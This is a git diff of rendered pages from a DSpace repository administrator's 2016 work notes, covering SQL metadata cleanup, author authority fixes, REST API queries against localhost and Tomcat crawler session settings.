    • We just need to set this in dspace/solr/search/conf/schema.xml:
    -
    <solrQueryParser defaultOperator="AND"/>
    +
    <solrQueryParser defaultOperator="AND"/>
     
    • It actually works really well, and search results return much less hits now (before, after):
    @@ -533,12 +533,12 @@ OCSP Response Data:
  • Discuss fixing some ORCIDs for CCAFS author Sonja Vermeulen with Magdalena Haman
  • This author has a few variations:
  • -
    dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like 'Vermeu
    -len, S%';
    +
    dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like 'Vermeu
    +len, S%';
     
    • And it looks like fe4b719f-6cc4-4d65-8504-7a83130b9f83 is the authority with the correct ORCID linked
    -
    dspacetest=# update metadatavalue set authority='fe4b719f-6cc4-4d65-8504-7a83130b9f83w', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Vermeulen, S%';
    +
    dspacetest=# update metadatavalue set authority='fe4b719f-6cc4-4d65-8504-7a83130b9f83w', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Vermeulen, S%';
     UPDATE 101
     
    • Hmm, now her name is missing from the authors facet and only shows the authority ID
    • @@ -547,7 +547,7 @@ UPDATE 101
    • On a clean snapshot of the database I see the correct authority should be f01f7b7b-be3f-4df7-a61d-b73c067de88d, not fe4b719f-6cc4-4d65-8504-7a83130b9f83
    • Updating her authorities again and reindexing:
    -
    dspacetest=# update metadatavalue set authority='f01f7b7b-be3f-4df7-a61d-b73c067de88d', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Vermeulen, S%';
    +
    dspacetest=# update metadatavalue set authority='f01f7b7b-be3f-4df7-a61d-b73c067de88d', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Vermeulen, S%';
     UPDATE 101
     
    • Use GitHub icon from Font Awesome instead of a PNG to save one extra network request
    • @@ -564,8 +564,8 @@ UPDATE 101
    • Minor fix to a string in Atmire’s CUA module (#280)
    • This seems to be what I’ll need to do for Sonja Vermeulen (but with 2b4166b7-6e4d-4f66-9d8b-ddfbec9a6ae0 instead on the live site):
    -
    dspacetest=# update metadatavalue set authority='09e4da69-33a3-45ca-b110-7d3f82d2d6d2', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Vermeulen, S%';
    -dspacetest=# update metadatavalue set authority='09e4da69-33a3-45ca-b110-7d3f82d2d6d2', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Vermeulen SJ%';
    +
    dspacetest=# update metadatavalue set authority='09e4da69-33a3-45ca-b110-7d3f82d2d6d2', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Vermeulen, S%';
    +dspacetest=# update metadatavalue set authority='09e4da69-33a3-45ca-b110-7d3f82d2d6d2', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Vermeulen SJ%';
     
    • And then update Discovery and Authority indexes
    • Minor fix for “Subject” string in Discovery search and Atmire modules (#281)
    • @@ -580,7 +580,7 @@ $ ./delete-metadata-values.py -i ilrisubjects-delete-13.csv -f cg.subject.ilri -
    • DSpace Test (linode02) became unresponsive for some reason, I had to hard reboot it from the Linode console
    • People on DSpace mailing list gave me a query to get authors from certain collections:
    -
    dspacetest=# select distinct text_value from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/5472', '10568/5473')));
    +
    dspacetest=# select distinct text_value from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/5472', '10568/5473')));
     

    2016-09-30

    • Deny access to REST API’s find-by-metadata-field endpoint to protect against an upstream security issue (DS-3250)
    • diff --git a/docs/2016-10/index.html b/docs/2016-10/index.html index 365520619..fa3edb15e 100644 --- a/docs/2016-10/index.html +++ b/docs/2016-10/index.html @@ -42,7 +42,7 @@ I exported a random item’s metadata as CSV, deleted all columns except id 0000-0002-6115-0956||0000-0002-3812-8793||0000-0001-7462-405X "/> - + @@ -168,7 +168,7 @@ $ ./delete-metadata-values.py -i authors-delete-3.csv -f dc.contributor.author -
    • CGSpace crashed a few times today
    • Generate list of unique authors in CCAFS collections:
    -
    dspacetest=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/32729', '10568/5472', '10568/5473', '10568/10288', '10568/70974', '10568/3547', '10568/3549', '10568/3531','10568/16890','10568/5470','10568/3546', '10568/36024', '10568/66581', '10568/21789', '10568/5469', '10568/5468', '10568/3548', '10568/71053', '10568/25167'))) group by text_value order by count desc) to /tmp/ccafs-authors.csv with csv;
    +
    dspacetest=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/32729', '10568/5472', '10568/5473', '10568/10288', '10568/70974', '10568/3547', '10568/3549', '10568/3531','10568/16890','10568/5470','10568/3546', '10568/36024', '10568/66581', '10568/21789', '10568/5469', '10568/5468', '10568/3548', '10568/71053', '10568/25167'))) group by text_value order by count desc) to /tmp/ccafs-authors.csv with csv;
     

    2016-10-05

    • Work on more infrastructure cleanups for Ansible DSpace role
    • @@ -190,7 +190,7 @@ $ ./delete-metadata-values.py -i authors-delete-3.csv -f dc.contributor.author -
    • Re-deploy CGSpace with latest changes from late September and early October
    • Run fixes for ILRI subjects and delete blank metadata values:
    -
    dspace=# delete from metadatavalue where resource_type_id=2 and text_value='';
    +
    dspace=# delete from metadatavalue where resource_type_id=2 and text_value='';
     DELETE 11
     
    • Run all system updates and reboot CGSpace
    • @@ -211,7 +211,7 @@ DELETE 11
      • A bit more cleanup on the CCAFS authors, and run the corrections on DSpace Test:
      -
      $ ./fix-metadata-values.py -i ccafs-authors-oct-16.csv -f dc.contributor.author -t 'correct name' -m 3 -d dspace -u dspace -p fuuu
      +
      $ ./fix-metadata-values.py -i ccafs-authors-oct-16.csv -f dc.contributor.author -t 'correct name' -m 3 -d dspace -u dspace -p fuuu
       
      • One observation is that there are still some old versions of names in the author lookup because authors appear in other communities (as we only corrected authors from CCAFS for this round)
      @@ -253,35 +253,35 @@ $ git rebase -i dspace-5.5
    • Start testing some things for DSpace 5.5, like command line metadata import, PDF media filter, and Atmire CUA
    • Start looking at batch fixing of “old” ILRI website links without www or https, for example:
    -
    dspace=# select * from metadatavalue where resource_type_id=2 and text_value like 'http://ilri.org%';
    +
    dspace=# select * from metadatavalue where resource_type_id=2 and text_value like 'http://ilri.org%';
     
    • Also CCAFS has HTTPS and their links should use it where possible:
    -
    dspace=# select * from metadatavalue where resource_type_id=2 and text_value like 'http://ccafs.cgiar.org%';
    +
    dspace=# select * from metadatavalue where resource_type_id=2 and text_value like 'http://ccafs.cgiar.org%';
     
    • And this will find community and collection HTML text that is using the old style PNG/JPG icons for RSS and email (we should be using Font Awesome icons instead):
    -
    dspace=# select text_value from metadatavalue where resource_type_id in (3,4) and text_value like '%Iconrss2.png%';
    +
    dspace=# select text_value from metadatavalue where resource_type_id in (3,4) and text_value like '%Iconrss2.png%';
     
    • Turns out there are shit tons of varieties of this, like with http, https, www, separate </img> tags, alignments, etc
    • Had to find all variations and replace them individually:
    -
    dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://www.ilri.org/images/Iconrss2.png"/>','<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://www.ilri.org/images/Iconrss2.png"/>%';
    -dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://www.ilri.org/images/email.jpg"/>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://www.ilri.org/images/email.jpg"/>%';
    -dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="http://www.ilri.org/images/Iconrss2.png"/>', '<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="http://www.ilri.org/images/Iconrss2.png"/>%';
    -dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="http://www.ilri.org/images/email.jpg"/>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="http://www.ilri.org/images/email.jpg"/>%';
    -dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="http://www.ilri.org/images/Iconrss2.png"></img>', '<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="http://www.ilri.org/images/Iconrss2.png"></img>%';
    -dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="http://www.ilri.org/images/email.jpg"></img>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="http://www.ilri.org/images/email.jpg"></img>%';
    -dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://ilri.org/images/Iconrss2.png"></img>', '<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://ilri.org/images/Iconrss2.png"></img>%';
    -dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://ilri.org/images/email.jpg"></img>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://ilri.org/images/email.jpg"></img>%';
    -dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://www.ilri.org/images/Iconrss2.png"></img>', '<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://www.ilri.org/images/Iconrss2.png"></img>%';
    -dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://www.ilri.org/images/email.jpg"></img>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://www.ilri.org/images/email.jpg"></img>%';
    -dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://ilri.org/images/Iconrss2.png"/>', '<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://ilri.org/images/Iconrss2.png"/>%';
    -dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://ilri.org/images/email.jpg"/>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://ilri.org/images/email.jpg"/>%';
    -dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img valign="center" align="left" src="https://www.ilri.org/images/Iconrss2.png"/>', '<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img valign="center" align="left" src="https://www.ilri.org/images/Iconrss2.png"/>%';
    -dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img valign="center" align="left" src="https://www.ilri.org/images/email.jpg"/>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img valign="center" align="left" src="https://www.ilri.org/images/email.jpg"/>%';
    -dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img valign="center" align="left" src="http://www.ilri.org/images/Iconrss2.png"/>', '<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img valign="center" align="left" src="http://www.ilri.org/images/Iconrss2.png"/>%';
    -dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img valign="center" align="left" src="http://www.ilri.org/images/email.jpg"/>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img valign="center" align="left" src="http://www.ilri.org/images/email.jpg"/>%';
    +
    dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://www.ilri.org/images/Iconrss2.png"/>','<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://www.ilri.org/images/Iconrss2.png"/>%';
    +dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://www.ilri.org/images/email.jpg"/>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://www.ilri.org/images/email.jpg"/>%';
    +dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="http://www.ilri.org/images/Iconrss2.png"/>', '<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="http://www.ilri.org/images/Iconrss2.png"/>%';
    +dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="http://www.ilri.org/images/email.jpg"/>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="http://www.ilri.org/images/email.jpg"/>%';
    +dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="http://www.ilri.org/images/Iconrss2.png"></img>', '<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="http://www.ilri.org/images/Iconrss2.png"></img>%';
    +dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="http://www.ilri.org/images/email.jpg"></img>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="http://www.ilri.org/images/email.jpg"></img>%';
    +dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://ilri.org/images/Iconrss2.png"></img>', '<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://ilri.org/images/Iconrss2.png"></img>%';
    +dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://ilri.org/images/email.jpg"></img>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://ilri.org/images/email.jpg"></img>%';
    +dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://www.ilri.org/images/Iconrss2.png"></img>', '<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://www.ilri.org/images/Iconrss2.png"></img>%';
    +dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://www.ilri.org/images/email.jpg"></img>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://www.ilri.org/images/email.jpg"></img>%';
    +dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://ilri.org/images/Iconrss2.png"/>', '<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://ilri.org/images/Iconrss2.png"/>%';
    +dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://ilri.org/images/email.jpg"/>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://ilri.org/images/email.jpg"/>%';
    +dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img valign="center" align="left" src="https://www.ilri.org/images/Iconrss2.png"/>', '<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img valign="center" align="left" src="https://www.ilri.org/images/Iconrss2.png"/>%';
    +dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img valign="center" align="left" src="https://www.ilri.org/images/email.jpg"/>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img valign="center" align="left" src="https://www.ilri.org/images/email.jpg"/>%';
    +dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img valign="center" align="left" src="http://www.ilri.org/images/Iconrss2.png"/>', '<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img valign="center" align="left" src="http://www.ilri.org/images/Iconrss2.png"/>%';
    +dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img valign="center" align="left" src="http://www.ilri.org/images/email.jpg"/>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img valign="center" align="left" src="http://www.ilri.org/images/email.jpg"/>%';
     
    • Getting rid of these reduces the number of network requests each client makes on community/collection pages, and makes use of Font Awesome icons (which they are already loading anyways!)
    • And now that I start looking, I want to fix a bunch of links to popular sites that should be using HTTPS, like Twitter, Facebook, Google, Feed Burner, DOI, etc
    • @@ -321,9 +321,9 @@ UPDATE 0
      • Fix some messed up authors on CGSpace:
      -
      dspace=# update metadatavalue set authority='799da1d8-22f3-43f5-8233-3d2ef5ebf8a8', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Charleston, B.%';
      +
      dspace=# update metadatavalue set authority='799da1d8-22f3-43f5-8233-3d2ef5ebf8a8', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Charleston, B.%';
       UPDATE 10
      -dspace=# update metadatavalue set authority='e936f5c5-343d-4c46-aa91-7a1fff6277ed', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Knight-Jones%';
      +dspace=# update metadatavalue set authority='e936f5c5-343d-4c46-aa91-7a1fff6277ed', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Knight-Jones%';
       UPDATE 36
       
      • I updated the authority index but nothing seemed to change, so I’ll wait and do it again after I update Discovery below
      • @@ -336,7 +336,7 @@ UPDATE 36
      • Fix a bunch of countries in Open Refine and run the corrections on CGSpace:
      -
      $ ./fix-metadata-values.py -i countries-fix-18.csv -f dc.coverage.country -t 'correct' -m 228 -d dspace -u dspace -p fuuu
      +
      $ ./fix-metadata-values.py -i countries-fix-18.csv -f dc.coverage.country -t 'correct' -m 228 -d dspace -u dspace -p fuuu
       $ ./delete-metadata-values.py -i countries-delete-2.csv -f dc.coverage.country -m 228 -d dspace -u dspace -p fuuu
       
      • Run a shit ton of author fixes from Peter Ballantyne that we’ve been cleaning up for two months:
      • @@ -345,10 +345,10 @@ $ ./delete-metadata-values.py -i countries-delete-2.csv -f dc.coverage.country -
      • Run a few URL corrections for ilri.org and doi.org, etc:
      -
      dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://www.ilri.org','https://www.ilri.org') where resource_type_id=2 and text_value like '%http://www.ilri.org%';
      -dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://mahider.ilri.org', 'https://cgspace.cgiar.org') where resource_type_id=2 and text_value like '%http://mahider.%.org%' and metadata_field_id not in (28);
      -dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://dx.doi.org', 'https://dx.doi.org') where resource_type_id=2 and text_value like '%http://dx.doi.org%' and metadata_field_id not in (18,26,28,111);
      -dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://doi.org', 'https://dx.doi.org') where resource_type_id=2 and text_value like '%http://doi.org%' and metadata_field_id not in (18,26,28,111);
      +
      dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://www.ilri.org','https://www.ilri.org') where resource_type_id=2 and text_value like '%http://www.ilri.org%';
      +dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://mahider.ilri.org', 'https://cgspace.cgiar.org') where resource_type_id=2 and text_value like '%http://mahider.%.org%' and metadata_field_id not in (28);
      +dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://dx.doi.org', 'https://dx.doi.org') where resource_type_id=2 and text_value like '%http://dx.doi.org%' and metadata_field_id not in (18,26,28,111);
      +dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://doi.org', 'https://dx.doi.org') where resource_type_id=2 and text_value like '%http://doi.org%' and metadata_field_id not in (18,26,28,111);
       
      • I skipped metadata fields like citation and description
      diff --git a/docs/2016-11/index.html b/docs/2016-11/index.html index 08b5166b7..9926638c3 100644 --- a/docs/2016-11/index.html +++ b/docs/2016-11/index.html @@ -26,7 +26,7 @@ Add dc.type to the output options for Atmire’s Listings and Reports module Add dc.type to the output options for Atmire’s Listings and Reports module (#286) "/> - + @@ -160,7 +160,7 @@ java.lang.NullPointerException
      • Horrible one liner to get Linode ID from certain Ansible host vars:
      -
      $ grep -A 3 contact_info * | grep -E "(Orth|Sisay|Peter|Daniel|Tsega)" | awk -F'-' '{print $1}' | grep linode | uniq | xargs grep linode_id
      +
      $ grep -A 3 contact_info * | grep -E "(Orth|Sisay|Peter|Daniel|Tsega)" | awk -F'-' '{print $1}' | grep linode | uniq | xargs grep linode_id
       
      • I noticed some weird CRPs in the database, and they don’t show up in Discovery for some reason, perhaps the :
      • I’ll export these and fix them in batch:
      • @@ -170,7 +170,7 @@ COPY 22
      • Test running the replacements:
      -
      $ ./fix-metadata-values.py -i /tmp/CRPs.csv -f cg.contributor.crp -t correct -m 230 -d dspace -u dspace -p 'fuuu'
      +
      $ ./fix-metadata-values.py -i /tmp/CRPs.csv -f cg.contributor.crp -t correct -m 230 -d dspace -u dspace -p 'fuuu'
       
      • Add AMR to ILRI subjects and remove one duplicate instance of IITA in author affiliations controlled vocabulary (#288)
      @@ -200,11 +200,11 @@ COPY 22
    • Helping Megan Zandstra and CIAT with some questions about the REST API
    • Playing with find-by-metadata-field, this works:
    -
    $ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "SEEDS"}'
    +
    $ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "SEEDS"}'
     
    • But the results are deceiving because metadata fields can have text languages and your query must match exactly!
    -
    dspace=# select distinct text_value, text_lang from metadatavalue where resource_type_id=2 and metadata_field_id=203 and text_value='SEEDS';
    +
    dspace=# select distinct text_value, text_lang from metadatavalue where resource_type_id=2 and metadata_field_id=203 and text_value='SEEDS';
      text_value | text_lang
     ------------+-----------
      SEEDS      |
    @@ -215,23 +215,23 @@ COPY 22
     
  • So basically, the text language here could be null, blank, or en_US
  • To query metadata with these properties, you can do:
  • -
    $ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "SEEDS"}' | jq length
    +
    $ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "SEEDS"}' | jq length
     55
    -$ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "SEEDS", "language":""}' | jq length
    +$ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "SEEDS", "language":""}' | jq length
     34
    -$ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "SEEDS", "language":"en_US"}' | jq length
    +$ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "SEEDS", "language":"en_US"}' | jq length
     
    • The results (55+34=89) don’t seem to match those from the database:
    -
    dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=203 and text_value='SEEDS' and text_lang is null;
    +
    dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=203 and text_value='SEEDS' and text_lang is null;
      count
     -------
         15
    -dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=203 and text_value='SEEDS' and text_lang='';
    +dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=203 and text_value='SEEDS' and text_lang='';
      count
     -------
          4
    -dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=203 and text_value='SEEDS' and text_lang='en_US';
    +dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=203 and text_value='SEEDS' and text_lang='en_US';
      count
     -------
         66
    @@ -267,27 +267,27 @@ COPY 14
     
    • Perhaps we need to fix them all in batch, or experiment with fixing only certain metadatavalues:
    -
    dspace=# update metadatavalue set text_lang='en_US' where resource_type_id=2 and metadata_field_id=203 and text_value='SEEDS';
    +
    dspace=# update metadatavalue set text_lang='en_US' where resource_type_id=2 and metadata_field_id=203 and text_value='SEEDS';
     UPDATE 85
     
    • The fix-metadata.py script I have is meant for specific metadata values, so if I want to update some text_lang values I should just do it directly in the database
    • For example, on a limited set:
    -
    dspace=# update metadatavalue set text_lang=NULL where resource_type_id=2 and metadata_field_id=203 and text_value='LIVESTOCK' and text_lang='';
    +
    dspace=# update metadatavalue set text_lang=NULL where resource_type_id=2 and metadata_field_id=203 and text_value='LIVESTOCK' and text_lang='';
     UPDATE 420
     
    • And assuming I want to do it for all fields:
    -
    dspacetest=# update metadatavalue set text_lang=NULL where resource_type_id=2 and text_lang='';
    +
    dspacetest=# update metadatavalue set text_lang=NULL where resource_type_id=2 and text_lang='';
     UPDATE 183726
     
    • After that restarted Tomcat and PostgreSQL (because I’m superstitious about caches) and now I see the following in REST API query:
    -
    $ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "SEEDS"}' | jq length
    +
    $ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "SEEDS"}' | jq length
     71
    -$ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "SEEDS", "language":""}' | jq length
    +$ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "SEEDS", "language":""}' | jq length
     0
    -$ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "SEEDS", "language":"en_US"}' | jq length
    +$ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "SEEDS", "language":"en_US"}' | jq length
     
    • Not sure what’s going on, but Discovery shows 83 values, and database shows 85, so I’m going to reindex Discovery just in case
    @@ -298,7 +298,7 @@ $ curl -s -H "accept: application/json" -H "Content-Type: applica
  • So there is apparently this Tomcat native way to limit web crawlers to one session: Crawler Session Manager
  • After adding that to server.xml bots matching the pattern in the configuration will all use ONE session, just like normal users:
  • -
    $ http --print h https://dspacetest.cgiar.org 'User-Agent:Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'
    +
    $ http --print h https://dspacetest.cgiar.org 'User-Agent:Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'
     HTTP/1.1 200 OK
     Connection: keep-alive
     Content-Encoding: gzip
    @@ -312,7 +312,7 @@ Vary: Accept-Encoding
     X-Cocoon-Version: 2.2.0
     X-Robots-Tag: none
     
    -$ http --print h https://dspacetest.cgiar.org 'User-Agent:Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'
    +$ http --print h https://dspacetest.cgiar.org 'User-Agent:Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'
     HTTP/1.1 200 OK
     Connection: keep-alive
     Content-Encoding: gzip
    @@ -336,7 +336,7 @@ X-Cocoon-Version: 2.2.0
     
    • Seems the default regex doesn’t catch Baidu, though:
    -
    $ http --print h https://dspacetest.cgiar.org 'User-Agent:Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'
    +
    $ http --print h https://dspacetest.cgiar.org 'User-Agent:Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'
     HTTP/1.1 200 OK
     Connection: keep-alive
     Content-Encoding: gzip
    @@ -349,7 +349,7 @@ Transfer-Encoding: chunked
     Vary: Accept-Encoding
     X-Cocoon-Version: 2.2.0
     
    -$ http --print h https://dspacetest.cgiar.org 'User-Agent:Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'
    +$ http --print h https://dspacetest.cgiar.org 'User-Agent:Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'
     HTTP/1.1 200 OK
     Connection: keep-alive
     Content-Encoding: gzip
    @@ -365,17 +365,17 @@ X-Cocoon-Version: 2.2.0
     
  • Adding Baiduspider to the list of user agents seems to work, and the final configuration should be:
  • <!-- Crawler Session Manager Valve helps mitigate damage done by web crawlers -->
    -<Valve className="org.apache.catalina.valves.CrawlerSessionManagerValve"
